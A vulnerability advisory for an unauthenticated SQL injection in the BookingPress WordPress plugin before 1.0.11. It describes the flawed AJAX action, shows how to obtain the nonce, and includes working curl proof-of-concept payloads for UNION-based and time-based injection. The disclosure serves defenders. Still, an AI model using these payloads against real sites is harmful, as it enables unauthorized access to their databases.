WordPress Plugin Vulnerabilities
BookingPress < 1.0.11 - Unauthenticated SQL Injection
Description
The plugin fails to properly sanitize user supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL Injection
Proof of Concept
- Create a new "category" and associate it with a new "service" via the BookingPress admin menu (/wp-admin/admin.php?page=bookingpress_services) - Create a new page with the "[bookingpress_form]" shortcode embedded (the "BookingPress Step-by-step Wizard Form") - Visit the just created page as an unauthenticated user and extract the "nonce" (view source -> search for "action:'bookingpress_front_get_category_services'") - Invoke the following curl command curl -i 'https://example.com/wp-admin/admin-ajax.php' \ --data 'action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -' Time based payload: curl -i 'https://example.com/wp-admin/admin-ajax.php' \ --data 'action=bookingpress_front_get_category_services&_wpnonce=8cc8b79544&category_id=1&total_service=1) AND (SELECT 9578 FROM (SELECT(SLEEP(5)))iyUp)-- ZmjH'
Affects Plugins
Fixed in version 1.0.11
References
Classification
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-02-28 (about 1 years ago)
Added
2022-02-28 (about 1 years ago)
Last Updated
2022-04-16 (about 11 months ago)